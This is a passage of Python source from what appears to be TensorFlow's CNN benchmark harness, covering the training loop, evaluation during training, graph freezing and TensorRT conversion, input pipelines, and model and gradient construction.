summary_op=None, save_model_secs=self.params.save_model_secs, summary_writer=summary_writer, local_init_run_options=init_run_options) profiler = tf.profiler.Profiler() if self.params.tfprof_file else None if self.graph_file is not None: path, filename = os.path.split(self.graph_file) as_text = filename.endswith('txt') log_fn('Writing GraphDef as %s to %s' % ( # pyformat break 'text' if as_text else 'binary', self.graph_file)) tf.train.write_graph(tf.get_default_graph().as_graph_def(add_shapes=True), path, filename, as_text) start_standard_services = ( self.params.train_dir or self.dataset.queue_runner_required()) target = self.cluster_manager.get_target() if self.cluster_manager else '' with sv.managed_session( master=target, config=create_config_proto(self.params), start_standard_services=start_standard_services) as sess: # Anything that can potentially raise an OutOfRangeError with 'sess' MUST # be under this try block. The managed_session() context manager silently # ignores OutOfRangeError, so we must catch them and wrap them with # a different exception type so that they can be propagated up to the # caller. max_duration = self.params.max_duration try: stats = self.benchmark_with_session( sess, sv, graph_info, eval_graph_info, bcast_global_variables_op, is_chief, summary_writer, profiler, max_duration) except tf.errors.OutOfRangeError: raise RuntimeError( 'Received OutOfRangeError. Wrapping in Runtime error to avoid ' 'Supervisor from suppressing the error. Original OutOfRangeError ' 'with traceback:\n' + traceback.format_exc()) sv.stop() if profiler: generate_tfprof_profile(profiler, self.params.tfprof_file) return stats def benchmark_with_session(self, sess, supervisor, graph_info, eval_graph_info, bcast_global_variables_op, is_chief, summary_writer, profiler, max_duration=None): """Benchmarks the graph with the given session. Args: sess: The session to benchmark the graph with supervisor: The Supervisor that created the session. graph_info: the namedtuple returned by _build_graph() which contains all necessary information to benchmark the graph, including named tensors/ops list, fetches, etc. eval_graph_info: Similar to graph_info but for the eval graph if --eval_during_training_every_n_steps is used. Otherwise, None. bcast_global_variables_op: If Horovod is used, the op to broadcast the global variables to all the processes. None if Horovod is not used. is_chief: True if this is the chief process. summary_writer: The SummaryWriter used to write summaries, or None if summaries are not used. profiler: The tf.profiler.Profiler, or None if tfprof is not used. Returns: Dictionary containing training statistics (num_workers, num_steps, average_wall_time, images_per_sec). """ if self.params.backbone_model_path is not None: self.model.load_backbone_model(sess, self.params.backbone_model_path) if bcast_global_variables_op: sess.run(bcast_global_variables_op) image_producer = None if graph_info.input_producer_op is not None: image_producer = cnn_util.ImageProducer( sess, graph_info.input_producer_op, self.batch_group_size, self.params.use_python32_barrier) image_producer.start() if graph_info.enqueue_ops: for i in xrange(len(graph_info.enqueue_ops)): sess.run(graph_info.enqueue_ops[:(i + 1)]) if image_producer is not None: image_producer.notify_image_consumption() self.init_global_step, = sess.run([graph_info.global_step]) if self.job_name and not self.params.cross_replica_sync: # TODO(zhengxq): Do we need to use a global step watcher at all? global_step_watcher = GlobalStepWatcher( sess, graph_info.global_step, self.num_workers * self.num_warmup_batches + self.init_global_step, self.num_workers * (self.num_warmup_batches + self.num_batches) - 1) global_step_watcher.start() else: global_step_watcher = None eval_image_producer = None if eval_graph_info: # We pass local_var_init_op_group=None because the Supervisor already # initialized local variables above. We need to have the Supervisor # initialize the local variables, because otherwise it throws an error # complaining that not all variables were initialized. eval_image_producer = self._initialize_eval_graph( eval_graph_info.enqueue_ops, eval_graph_info.input_producer_op, local_var_init_op_group=None, sess=sess) step_train_times = [] log_fn('Running warm up') local_step = -1 * self.num_warmup_batches if self.single_session: # In single session mode, each step, the global_step is incremented by # 1. In non-single session mode, each step, the global_step is # incremented once per worker. This means we need to divide # init_global_step by num_workers only in non-single session mode. end_local_step = self.num_batches - self.init_global_step else: end_local_step = self.num_batches - (self.init_global_step // self.num_workers) if not global_step_watcher: # In cross-replica sync mode, all workers must run the same number of # local steps, or else the workers running the extra step will block. done_fn = lambda: local_step >= end_local_step else: done_fn = global_step_watcher.done if self.params.debugger is not None: if self.params.debugger == 'cli': log_fn('The CLI TensorFlow debugger will be used.') sess = tf_debug.LocalCLIDebugWrapperSession(sess) else: log_fn('The TensorBoard debugger plugin will be used.') sess = tf_debug.TensorBoardDebugWrapperSession(sess, self.params.debugger) mlperf.logger.log(key=mlperf.tags.TRAIN_LOOP) skip_final_eval = False accuracy_at_1 = None last_eval_step = local_step loop_start_time = time.time() last_average_loss = None start_time_mb = datetime.datetime.now() while not done_fn(): seconds = (datetime.datetime.now() - start_time_mb).total_seconds() minutes = seconds / 60.0 if max_duration is not None and minutes >= max_duration: break if local_step == 0: log_fn('Done warm up') if graph_info.execution_barrier: log_fn('Waiting for other replicas to finish warm up') sess.run([graph_info.execution_barrier]) # TODO(laigd): rename 'Img' to maybe 'Input'. header_str = ('Step\tImg/sec\t' + self.params.loss_type_to_report.replace('/', ' ')) if self.params.print_training_accuracy or self.params.forward_only: # TODO(laigd): use the actual accuracy op names of the model. header_str += '\ttop_1_accuracy\ttop_5_accuracy' log_fn(header_str) assert len(step_train_times) == self.num_warmup_batches # reset times to ignore warm up batch step_train_times = [] loop_start_time = time.time() if (summary_writer and (local_step + 1) % self.params.save_summaries_steps == 0): fetch_summary = graph_info.summary_op else: fetch_summary = None collective_graph_key = 7 if ( self.params.variable_update == 'collective_all_reduce') else 0 (summary_str, last_average_loss) = benchmark_one_step( sess, graph_info.fetches, local_step, self.batch_size * (self.num_workers if self.single_session else 1), step_train_times, self.trace_filename, self.params.partitioned_graph_file_prefix, profiler, image_producer, self.params, fetch_summary, benchmark_logger=self.benchmark_logger, collective_graph_key=collective_graph_key) if summary_str is not None and is_chief: supervisor.summary_computed(sess, summary_str) local_step += 1 if (self.params.save_model_steps and local_step % self.params.save_model_steps == 0 and local_step > 0 and is_chief): supervisor.saver.save(sess, supervisor.save_path, supervisor.global_step) if (eval_graph_info and local_step > 0 and not done_fn() and self._should_eval_during_training(local_step)): python_global_step = sess.run(graph_info.global_step) num_steps_since_last_eval = local_step - last_eval_step # The INPUT_SIZE tag value might not match the # PREPROC_NUM_TRAIN_EXAMPLES tag value, because the number of examples # run, which is INPUT_SIZE, is rounded up to the nearest multiple of # self.batch_size. mlperf.logger.log( key=mlperf.tags.INPUT_SIZE, value=num_steps_since_last_eval * self.batch_size) log_fn('Running evaluation at global_step {}'.format( python_global_step)) accuracy_at_1, _ = self._eval_once( sess, summary_writer, eval_graph_info.fetches, eval_graph_info.summary_op, eval_image_producer, python_global_step) last_eval_step = local_step if (self.params.stop_at_top_1_accuracy and accuracy_at_1 >= self.params.stop_at_top_1_accuracy): log_fn('Stopping, as eval accuracy at least %s was reached' % self.params.stop_at_top_1_accuracy) skip_final_eval = True break else: log_fn('Resuming training') if eval_graph_info and self.model.reached_target(): log_fn('Stopping, as the model indicates its custom goal was reached') skip_final_eval = True break loop_end_time = time.time() # Waits for the global step to be done, regardless of done_fn. if global_step_watcher: while not global_step_watcher.done(): time.sleep(.25) if not global_step_watcher: elapsed_time = loop_end_time - loop_start_time average_wall_time = elapsed_time / local_step if local_step > 0 else 0 images_per_sec = (self.num_workers * local_step * self.batch_size / elapsed_time) num_steps = local_step * self.num_workers else: # NOTE: Each worker independently increases the global step. So, # num_steps will be the sum of the local_steps from each worker. num_steps = global_step_watcher.num_steps() elapsed_time = global_step_watcher.elapsed_time() average_wall_time = (elapsed_time * self.num_workers / num_steps if num_steps > 0 else 0) images_per_sec = num_steps * self.batch_size / elapsed_time # We skip printing images/sec if --eval_during_training_* is specified, # because we are both processing training and evaluation images, so a # singular "images/sec" value is meaningless. if self.mode != constants.BenchmarkMode.TRAIN_AND_EVAL: log_fn('-' * 64) # TODO(laigd): rename 'images' to maybe 'inputs'. log_fn('total images/sec: %.2f' % images_per_sec) log_fn('-' * 64) else: log_fn('Done with training') num_steps_since_last_eval = local_step - last_eval_step mlperf.logger.log( key=mlperf.tags.INPUT_SIZE, value=num_steps_since_last_eval * self.batch_size) python_global_step = sess.run(graph_info.global_step) if eval_graph_info and not skip_final_eval: log_fn('Running final evaluation at global_step {}'.format( python_global_step)) accuracy_at_1, _ = self._eval_once( sess, summary_writer, eval_graph_info.fetches, eval_graph_info.summary_op, eval_image_producer, python_global_step) num_epochs_ran = (python_global_step * self.batch_size / self.dataset.num_examples_per_epoch('train')) mlperf.logger.log_train_epochs(num_epochs_ran) if image_producer is not None: image_producer.done() if eval_image_producer is not None: eval_image_producer.done() if is_chief: if self.benchmark_logger: self.benchmark_logger.log_metric( 'average_examples_per_sec', images_per_sec, global_step=num_steps) # Save the model checkpoint. if self.params.train_dir is not None and is_chief: checkpoint_path = os.path.join(self.params.train_dir, 'model.ckpt') if not gfile.Exists(self.params.train_dir): gfile.MakeDirs(self.params.train_dir) supervisor.saver.save(sess, checkpoint_path, graph_info.global_step) if graph_info.execution_barrier: # Wait for other workers to reach the end, so this worker doesn't # go away underneath them. sess.run([graph_info.execution_barrier]) stats = { 'num_workers': self.num_workers, 'num_steps': num_steps, 'average_wall_time': average_wall_time, 'images_per_sec': images_per_sec } if last_average_loss is not None: stats['last_average_loss'] = last_average_loss success = bool(self.model.reached_target() or (accuracy_at_1 and self.params.stop_at_top_1_accuracy and accuracy_at_1 >= self.params.stop_at_top_1_accuracy)) mlperf.logger.log(key=mlperf.tags.RUN_STOP, value={'success': success}) mlperf.logger.log(key=mlperf.tags.RUN_FINAL) return stats def _should_eval_during_training(self, step): """Return True iff should run eval during training at current step.""" assert self.mode == constants.BenchmarkMode.TRAIN_AND_EVAL if self.params.eval_during_training_every_n_steps: return step % self.params.eval_during_training_every_n_steps == 0 # All other --eval_during_training_* flags are converted to step numbers # at which the model should run evaluation during training. return step in self.eval_during_training_at_specified_steps def _preprocess_graph(self, graph, graph_info): """Preprocess the graph before executing. Depending on the params, it runs various preprocessing on the graph, including freezing, TensorRT conversion, etc. Args: graph: the graph to preprocess. graph_info: the namedtuple returned by _build_graph() which contains all necessary information to benchmark the graph, including named tensors/ops list, fetches, etc. Returns: The updated graph and graph_info with the ops/tensors/fetches updated according to the imported graph. """ assert isinstance(graph_info.fetches, dict) assert isinstance(graph_info.global_step, tf.Variable) if not self.forward_only_and_freeze: return (graph, graph_info) # Get the names of the ops that need to keep during conversion. flattened_op_names = list( set([ v.name.split(':')[0] for v in nest.flatten(graph_info) if v is not None ])) # Get variables that we don't want to freeze. # Only keep unfreezable variables in forward_only_and_freeze mode. # TODO(laigd): consider making global_step a constant. variables_to_keep = {graph_info.global_step: tf.GraphKeys.GLOBAL_VARIABLES} variables_to_keep.update({ local_variable: tf.GraphKeys.LOCAL_VARIABLES for local_variable in self._unfreezable_local_variables(graph) }) variable_initializers = [ variable.initializer.name for variable in variables_to_keep] output_node_names = ( flattened_op_names + # Add variable initializer and read ops to the output list, so # convert_variables_to_constants() will keep them. variable_initializers + [variable.value().op.name for variable in variables_to_keep]) graphdef = graph.as_graph_def(add_shapes=True) # Freeze the graph. with graph.as_default(): with tf.Session(config=create_config_proto(self.params)) as sess: sess.run(tf.global_variables_initializer()) sess.run(tf.local_variables_initializer()) graphdef = graph_util.convert_variables_to_constants( sess, graphdef, output_node_names, variable_names_blacklist=[ variable.op.name for variable in variables_to_keep ]) # Run TensorRT conversion. if self.params.trt_mode: # Import here instead of at top, because this will crash if TensorRT is # not installed from tensorflow.contrib import tensorrt as trt # pylint: disable=g-import-not-at-top # Avoid TF-TRT bridge from touching all variable initializer ops and their # dependencies, since they can directly be fetched by sess.run()s that # initialize the variables. # pylint: disable=protected-access name_to_input_name, _, _ = graph_util_impl._extract_graph_summary( graphdef) initializer_subgraph_ops = graph_util_impl._bfs_for_reachable_nodes( variable_initializers, name_to_input_name) # pylint: enable=protected-access graphdef = trt.create_inference_graph( graphdef, outputs=output_node_names + list(initializer_subgraph_ops), max_batch_size=self.model.get_batch_size(), max_workspace_size_bytes=self.params.trt_max_workspace_size_bytes, precision_mode=self.params.trt_mode) # Creates a new graph as the default and import the converted graph back. updated_graph = tf.Graph() def _get_tensors_or_ops(inputs): """Gets the updated tensors or ops from 'updated_graph'.""" def _get_fn(element): if element is None: return None if ':' in element.name: return updated_graph.get_tensor_by_name(element.name) return updated_graph.get_operation_by_name(element.name) if isinstance(inputs, (list, dict, tuple)): return nest.map_structure(_get_fn, inputs) else: return _get_fn(inputs) with updated_graph.as_default(): importer.import_graph_def(graph_def=graphdef, name='') # Update the variables for variable in variables_to_keep: updated_variable = tf.Variable.from_proto(variable.to_proto()) tf.add_to_collection(variables_to_keep[variable], updated_variable) if variable is graph_info.global_step: updated_global_step = updated_variable updated_graph_info = GraphInfo( input_producer_op=_get_tensors_or_ops(graph_info.input_producer_op), enqueue_ops=_get_tensors_or_ops(graph_info.enqueue_ops), execution_barrier=_get_tensors_or_ops(graph_info.execution_barrier), local_var_init_op_group=_get_tensors_or_ops( graph_info.local_var_init_op_group), fetches=_get_tensors_or_ops(graph_info.fetches), global_step=updated_global_step, summary_op=None) return (updated_graph, updated_graph_info) def _build_input_processing(self, shift_ratio=0): """"Build the image (pre)processing portion of the model graph. Args: shift_ratio: shift_ratio for data_flow_ops.RecordInput. Returns: An InputProcessingInfo containing all the input sources to the model. """ input_processing_info = InputProcessingInfo( input_producer_op=None, input_producer_stages=None, function_buffering_resources=None, multi_device_iterator_input=None) mlperf.logger.log(key=mlperf.tags.INPUT_ORDER) if not self._doing_eval: mlperf.logger.log(key=mlperf.tags.INPUT_BATCH_SIZE, value=self.batch_size) # If using synthetic gpu inputs, do nothing on the cpu side. if self.dataset.use_synthetic_gpu_inputs(): assert not self.datasets_use_prefetch return input_processing_info if self._doing_eval: input_preprocessor = self.eval_input_preprocessor mlperf.logger.log(key=mlperf.tags.PREPROC_NUM_EVAL_EXAMPLES, value=self.dataset.num_examples_per_epoch('validation')) else: input_preprocessor = self.input_preprocessor mlperf.logger.log(key=mlperf.tags.PREPROC_NUM_TRAIN_EXAMPLES, value=self.dataset.num_examples_per_epoch('train')) # Use prefetching mechanism provided by dataset input pipeline. if self.datasets_use_prefetch: if self.params.use_multi_device_iterator: multi_device_iterator = ( input_preprocessor.build_multi_device_iterator( self.batch_size, len(self.devices), self.cpu_device, self.params, self.raw_devices, self.dataset, self._doing_eval)) return input_processing_info._replace( multi_device_iterator_input=multi_device_iterator.get_next()) subset = 'validation' if self._doing_eval else 'train' function_buffering_resources = ( input_preprocessor.build_prefetch_input_processing( self.batch_size, self.model.get_input_shapes(subset), len(self.devices), self.cpu_device, self.params, self.devices, self.model.get_input_data_types(subset), self.dataset, self._doing_eval)) return input_processing_info._replace( function_buffering_resources=function_buffering_resources) # Not using dataset prefetching. Use a staging area to mimic the prefetching # behavior instead. with tf.device(self.cpu_device): if self._doing_eval: subset = 'validation' else: subset = 'train' input_list = input_preprocessor.minibatch( self.dataset, subset=subset, params=self.params, shift_ratio=shift_ratio) input_producer_op = [] input_producer_stages = [] for device_num in range(len(self.devices)): staging_area = data_flow_ops.StagingArea( [parts[0].dtype for parts in input_list], shapes=[parts[0].get_shape() for parts in input_list], shared_name='input_producer_staging_area_%d_eval_%s' % (device_num, self._doing_eval)) input_producer_stages.append(staging_area) for group_index in xrange(self.batch_group_size): batch_index = group_index + device_num * self.batch_group_size put_op = staging_area.put( [parts[batch_index] for parts in input_list]) input_producer_op.append(put_op) assert input_producer_op return input_processing_info._replace( input_producer_op=input_producer_op, input_producer_stages=input_producer_stages) def _maybe_initialize_fp16(self): """Initialize fp16 settings.""" if self.params.use_fp16 and not self._doing_eval: init_loss_scale_val = float(self.params.fp16_loss_scale or self.model.get_fp16_loss_scale()) self.loss_scale = None self.loss_scale_normal_steps = None if self.enable_auto_loss_scale or init_loss_scale_val != 1: self.loss_scale = tf.get_variable( name='loss_scale', initializer=init_loss_scale_val, dtype=tf.float32, trainable=False) if self.enable_auto_loss_scale: self.loss_scale_normal_steps = tf.get_variable( name='loss_scale_normal_steps', initializer=0, trainable=False) def _build_model(self): """Build the TensorFlow graph.""" if self.datasets_use_prefetch: assert not self.params.staged_vars assert not self.variable_mgr.supports_staged_vars() # Adjust seed so different workers start read different input files. if self.params.variable_update == 'horovod': import horovod.tensorflow as hvd # pylint: disable=g-import-not-at-top seed_adjustment = hvd.rank() else: seed_adjustment = 0 mlperf.logger.log(key=mlperf.tags.RUN_SET_RANDOM_SEED, value=self.params.tf_random_seed + seed_adjustment) tf.set_random_seed(self.params.tf_random_seed + seed_adjustment) mlperf.logger.log(key=mlperf.tags.RUN_SET_RANDOM_SEED, value=4321 + seed_adjustment) np.random.seed(4321 + seed_adjustment) phase_train = not (self._doing_eval or self.params.forward_only) if self._doing_eval: mode_string = 'evaluation' else: mode_string = 'training' log_fn('Generating {} model'.format(mode_string)) losses = [] device_grads = [] all_logits = [] all_accuracy_ops = {} gpu_compute_stage_ops = [] gpu_grad_stage_ops = [] with tf.device(self.global_step_device): global_step = tf.train.get_or_create_global_step() self._maybe_initialize_fp16() # Build the processing and model for the worker. input_producer_op = None with tf.name_scope('input_processing'): input_processing_info = self._build_input_processing(shift_ratio=0) if input_processing_info.input_producer_op is not None: input_producer_op = tf.group(*input_processing_info.input_producer_op) update_ops = None staging_delta_ops = [] for device_num in range(len(self.devices)): with tf.name_scope('tower_%i' % device_num) as name_scope, ( self.variable_mgr.create_outer_variable_scope(device_num)): results = self.add_forward_pass_and_gradients( phase_train, device_num, device_num, input_processing_info, gpu_compute_stage_ops, gpu_grad_stage_ops) if self.params.backbone_model_path: self.model.add_backbone_saver() if phase_train: losses.append(results['loss']) device_grads.append(results['gradvars']) else: all_logits.append(results['logits']) if not phase_train or self.params.print_training_accuracy: for name, op in results.items(): if name.startswith('accuracy:'): key = name[9:] if key not in all_accuracy_ops: all_accuracy_ops[key] = [] all_accuracy_ops[key].append(op) if device_num == 0: # Retain the Batch Normalization updates operations only from the # first tower. These operations update the moving mean and moving # variance variables, which are updated (but not used) during # training, and used during evaluation. The moving mean and variance # approximate the true mean and variance across all images in the # dataset. Therefore, in replicated mode, these moving averages would # be almost identical for each tower, and so we only update and save # the moving averages for one tower. In parameter server mode, all # towers share a copy of the variables so we also only need to update # and save the moving averages once. update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS, name_scope) if self.datasets_use_prefetch: assert not self.variable_mgr.staging_delta_ops else: staging_delta_ops = list(self.variable_mgr.staging_delta_ops) enqueue_ops = [] if not self.datasets_use_prefetch: if self.variable_mgr.supports_staged_vars(): for staging_ops in self.variable_mgr.staging_vars_on_devices: gpu_compute_stage_ops.extend( [put_op for _, (put_op, _) in six.iteritems(staging_ops)]) enqueue_ops.append(tf.group(*gpu_compute_stage_ops, name='gpu_compute_stage_ops_group')) if gpu_grad_stage_ops: staging_delta_ops += gpu_grad_stage_ops if staging_delta_ops: enqueue_ops.append(tf.group(*(staging_delta_ops))) if (self.mode == constants.BenchmarkMode.TRAIN_AND_EVAL and self.params.variable_update == 'replicated'): # We need to get all the update ops instead of only those for the first # tower. This is because during evaluation, each tower will read from its # own tower's moving averages instead of the first tower's moving # averages. # TODO(reedwm): Have each tower read from the first tower's moving # averages for a slight performance gain. update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) mlperf.logger.log(key=mlperf.tags.INPUT_BN_SPAN, value=self.batch_size // len(self.raw_devices)) fetches = self._build_fetches(global_step, all_logits, losses, device_grads, enqueue_ops, update_ops, all_accuracy_ops, phase_train) return (input_producer_op, enqueue_ops, fetches) def _build_fetches(self, global_step, all_logits, losses, device_grads, enqueue_ops, update_ops, all_accuracy_ops, phase_train): """Complete construction of model graph, populating the fetches map.""" fetches = {} if enqueue_ops: fetches['enqueue_ops'] = enqueue_ops for name, ops in all_accuracy_ops.items(): # For fetches that starts with 'tensor:', keep dimension and skip reducing # them to scalars. if name.startswith(constants.UNREDUCED_ACCURACY_OP_PREFIX): key = name[len(constants.UNREDUCED_ACCURACY_OP_PREFIX):] fetches[key] = tf.concat(ops, 0) else: fetches[name] = tf.reduce_sum(ops) / self.batch_size if self.task_index == 0 and self.params.summary_verbosity >= 1: tf.summary.scalar(name, fetches[name]) if not phase_train: if self.params.forward_only: fetches['all_logits'] = tf.concat(all_logits, 0) return fetches apply_gradient_devices, gradient_state = ( self.variable_mgr.preprocess_device_grads(device_grads)) # TODO(reedwm): Greatly simplify the learning rate code. if (self.params.variable_update == 'horovod' or self.params.variable_update == 'collective_all_reduce'): # Each worker independently increments global_step. examples_per_step = self.batch_size * self.num_workers else: # global_step is shared by all workers, and so every iteration # global_step is incremented by num_workers. examples_per_step = self.batch_size if self.params.compute_lr_on_cpu: with tf.device(self.cpu_device): learning_rate = get_learning_rate(self.params, global_step, self.dataset.num_examples_per_epoch(), self.model, examples_per_step) training_ops = [] for d, device in enumerate(apply_gradient_devices): with tf.device(device): with tf.name_scope('average_loss'): average_loss = tf.reduce_mean(losses) with tf.name_scope('get_gradients_to_apply'): avg_grads = self.variable_mgr.get_gradients_to_apply(d, gradient_state) if not self.params.compute_lr_on_cpu: # We compute the learning rate once for each device in # `apply_gradient_devices`. learning_rate = get_learning_rate( self.params, global_step, self.dataset.num_examples_per_epoch(), self.model, examples_per_step) gradient_clip = self.params.gradient_clip if gradient_clip is not None: with tf.name_scope('clip_gradients'): clipped_grads = [(tf.clip_by_value(grad, -gradient_clip, +gradient_clip), var) for grad, var in avg_grads] else: clipped_grads = avg_grads learning_rate = tf.identity(learning_rate, name='learning_rate_tensor') opt = get_optimizer(self.params, learning_rate) loss_scale_params = variable_mgr_util.AutoLossScaleParams( enable_auto_loss_scale=self.enable_auto_loss_scale, loss_scale=self.loss_scale, loss_scale_normal_steps=self.loss_scale_normal_steps, inc_loss_scale_every_n=self.params.fp16_inc_loss_scale_every_n, is_chief=not self.job_name or self.task_index == 0) with tf.name_scope('append_apply_gradient_ops'): self.variable_mgr.append_apply_gradients_ops( gradient_state, opt, clipped_grads, training_ops, loss_scale_params) train_op = tf.group(*(training_ops + update_ops), name='train_ops_group') with tf.device(self.cpu_device): if self.task_index == 0 and self.params.summary_verbosity >= 1: tf.summary.scalar('learning_rate', learning_rate) tf.summary.scalar(self.params.loss_type_to_report, average_loss) if self.loss_scale is not None: tf.summary.scalar('loss_scale', self.loss_scale) if self.loss_scale_normal_steps: tf.summary.scalar('loss_scale_normal_steps', self.loss_scale_normal_steps) if self.params.summary_verbosity >= 2: self.gradient_histogram_summary(avg_grads) if self.params.summary_verbosity >= 3: for grad, var in avg_grads: if grad is not None: tf.summary.histogram(var.op.name + '/gradients', grad) for var in tf.trainable_variables(): tf.summary.histogram(var.op.name, var) fetches['train_op'] = train_op fetches['average_loss'] = average_loss return fetches def gradient_histogram_summary(self, avg_grads): """Create histogram of log values of all non-zero gradients.""" with tf.name_scope('log_gradients_summary'): all_grads = [] for grad, _ in avg_grads: all_grads.append(tf.reshape(grad, [-1])) grads = tf.abs(tf.concat(all_grads, 0)) # exclude grads with zero values. indices_for_non_zero_grads = tf.where(tf.not_equal(grads, 0)) log_grads = tf.reshape( tf.log(tf.gather(grads, indices_for_non_zero_grads)), [-1]) tf.summary.histogram('log_gradients', log_grads) def _build_model_single_session(self): """Build the TensorFlow graph for multiple replicas in a single_session. Returns: input_producer_op: enqueue_ops: fetches: Raises: ValueError: optimizer not recognized. Single session runs multiple model replicas as part of one large distributed graph, whose global execution is always step-synchronized. """ # verify assumptions assert self.params.task_index == 0 assert not self._doing_eval assert not self.params.forward_only assert not self.params.staged_vars tf.set_random_seed(self.params.tf_random_seed) np.random.seed(4321) phase_train = True log_fn('Generating training model') losses = [] device_grads = [] all_logits = [] all_accuracy_ops = {} gpu_compute_stage_ops = [] gpu_grad_stage_ops = [] with tf.device(self.global_step_device): global_step = tf.train.get_or_create_global_step() update_ops = [] global_input_producer_op = [] is_local = not self.job_name if is_local: assert self.num_workers == 1 for task_num in range(self.num_workers): # Reset the devices that self.variable_mgr knows about to those # belonging to the next worker (task). self.reset_devices_for_task(task_num, is_local) # Build the per-worker image processing with tf.name_scope('input_processing'): input_processing_info = self._build_input_processing( shift_ratio=(task_num / self.num_workers)) if input_processing_info.input_producer_op is not None: global_input_producer_op.extend(input_processing_info.input_producer_op) # Build the per-worker model replica. for rel_device_num in range(len(self.devices)): abs_device_num = task_num * len(self.devices) + rel_device_num with self.variable_mgr.create_outer_variable_scope( abs_device_num), tf.name_scope( 'task_%i_tower_%i' % (task_num, rel_device_num)) as name_scope: task_results = self.add_forward_pass_and_gradients( phase_train, rel_device_num, abs_device_num, input_processing_info, gpu_compute_stage_ops, gpu_grad_stage_ops) if self.params.backbone_model_path: self.model.add_backbone_saver() if phase_train: losses.append(task_results['loss']) device_grads.append(task_results['gradvars']) else: all_logits.append(task_results['logits']) if not phase_train or self.params.print_training_accuracy: for name, op in task_results.items(): if name.startswith('accuracy:'): key = name[9:] if key not in all_accuracy_ops: all_accuracy_ops[key] = [] all_accuracy_ops[key].append(op) if rel_device_num == 0: # Retain the Batch Normalization updates operations only # from the first tower. These operations update the moving # mean and moving variance variables, which are updated # (but not used) during training, and used during # evaluation. The moving mean and variance approximate the # true mean and variance across all images in the # dataset. Therefore, in replicated mode, these moving # averages would be almost identical for each tower, and # so we only update and save the moving averages for one # tower. In parameter server mode, all towers share a copy # of the variables so we also only need to update and save # the moving averages once. update_ops.extend( tf.get_collection(tf.GraphKeys.UPDATE_OPS, name_scope)) assert not self.variable_mgr.staging_delta_ops enqueue_ops = [] if gpu_compute_stage_ops: enqueue_ops.append(tf.group(*gpu_compute_stage_ops, name='gpu_compute_stage_ops')) assert not self.variable_mgr.supports_staged_vars() assert not gpu_grad_stage_ops fetches = self._build_fetches(global_step, all_logits, losses, device_grads, enqueue_ops, update_ops, all_accuracy_ops, phase_train) if global_input_producer_op: global_input_producer_op = tf.group(*global_input_producer_op) else: global_input_producer_op = None return (global_input_producer_op, enqueue_ops, fetches) def add_forward_pass_and_gradients(self, phase_train, rel_device_num, abs_device_num, input_processing_info, gpu_compute_stage_ops, gpu_grad_stage_ops): """Add ops for forward-pass and gradient computations.""" nclass = self.dataset.num_classes if self.datasets_use_prefetch: function_buffering_resource = None if input_processing_info.function_buffering_resources: function_buffering_resource = ( input_processing_info.function_buffering_resources[rel_device_num]) input_data = None if input_processing_info.multi_device_iterator_input: input_data = ( input_processing_info.multi_device_iterator_input[rel_device_num]) # Exactly one of function_buffering_resource or input_data is not None. if function_buffering_resource is None and input_data is None: raise ValueError('Both function_buffering_resource and input_data ' 'cannot be null if datasets_use_prefetch=True') if function_buffering_resource is not None and input_data is not None: raise ValueError('Both function_buffering_resource and input_data ' 'cannot be specified. Only one should be.') with tf.device(self.raw_devices[rel_device_num]): if function_buffering_resource is not None: subset = 'validation' if self._doing_eval else 'train' input_list = prefetching_ops.function_buffering_resource_get_next( function_buffering_resource, output_types=self.model.get_input_data_types(subset)) else: input_list = input_data else: if not self.dataset.use_synthetic_gpu_inputs(): input_producer_stage = input_processing_info.input_producer_stages[ rel_device_num] with tf.device(self.cpu_device): host_input_list = input_producer_stage.get() with tf.device(self.raw_devices[rel_device_num]): gpu_compute_stage = data_flow_ops.StagingArea( [inp.dtype for inp in host_input_list], shapes=[inp.get_shape() for inp in host_input_list]) # The CPU-to-GPU copy is triggered here. gpu_compute_stage_op = gpu_compute_stage.put(host_input_list) input_list = gpu_compute_stage.get() gpu_compute_stage_ops.append(gpu_compute_stage_op) else: with tf.device(self.raw_devices[rel_device_num]): # Minor hack to avoid H2D copy when using synthetic data input_list = self.model.get_synthetic_inputs( BenchmarkCNN.GPU_CACHED_INPUT_VARIABLE_NAME, nclass) # Labels reshaping happens all on gpu:0. Reshaping synthetic labels on # multiple devices slows down XLA computation for an unknown reason. # TODO(b/116875203): Find/address root cause of XLA slow down. labels_device_placement_hack = ( self.dataset.use_synthetic_gpu_inputs() and self.params.xla_compile) def device_aware_reshape(tensor, shape): device = self.devices[rel_device_num] # Labels are int32, place reshapes on gpu:0 (no device placement) when the # hack is enabled. if labels_device_placement_hack and tensor.dtype == tf.int32: device = '' with tf.device(device): return tf.reshape(tensor, shape=shape) subset = 'validation' if self._doing_eval else 'train' input_shapes = self.model.get_input_shapes(subset) input_list = [ device_aware_reshape(input_list[i], shape=input_shapes[i]) for i in range(len(input_list)) ] def forward_pass_and_gradients(): """Builds forward pass and gradient computation network. When phase_train=True and print_training_accuracy=False: return [loss] + grads When phase_train=True and print_training_accuracy=True: return [logits, loss] + grads When phase_train=False, return [logits] Its output can always be unpacked by ``` outputs = forward_pass_and_gradients() logits, loss, grads = unpack_forward_pass_and_gradients_output(outputs) ``` Returns: outputs: A list of tensors depending on different modes. """ build_network_result = self.model.build_network( input_list, phase_train, nclass) logits = build_network_result.logits if not phase_train: return [logits] base_loss = self.model.loss_function(input_list, build_network_result) params = self.variable_mgr.trainable_variables_on_device( rel_device_num, abs_device_num) l2_loss = None total_loss = base_loss with tf.name_scope('l2_loss'): fp32_params = params if self.model.data_type == tf.float16 and self.params.fp16_vars: # fp16 reductions are very slow on GPUs, so cast to fp32 before # calling tf.nn.l2_loss and tf.add_n. # TODO(b/36217816): Once the bug is fixed, investigate if we should do # this reduction in fp16. fp32_params = (tf.cast(p, tf.float32) for p in params) filtered_params = self.model.filter_l2_loss_vars(fp32_params) if rel_device_num == len(self.devices) - 1: # We compute the L2 loss for only one device instead of all of them, # because the L2 loss for each device is the same. To adjust for this, # we multiply the L2 loss by the number of devices. We choose the # last device because for some reason, on a Volta DGX1, the first four # GPUs take slightly longer to complete a step than the last four. # TODO(reedwm): Shard the L2 loss computations across GPUs. if self.params.single_l2_loss_op: # TODO(reedwm): If faster, create a fused op that does the L2 loss # on multiple tensors, and use that instead of concatenating # tensors. reshaped_params = [tf.reshape(p, (-1,)) for p in filtered_params] l2_loss = tf.nn.l2_loss(tf.concat(reshaped_params, axis=0)) else: l2_loss = tf.add_n([tf.nn.l2_loss(v) for v in filtered_params]) weight_decay = self.params.weight_decay mlperf.logger.log(key=mlperf.tags.OPT_WEIGHT_DECAY, value=weight_decay) if (weight_decay is not None and weight_decay != 0. and l2_loss is not None): 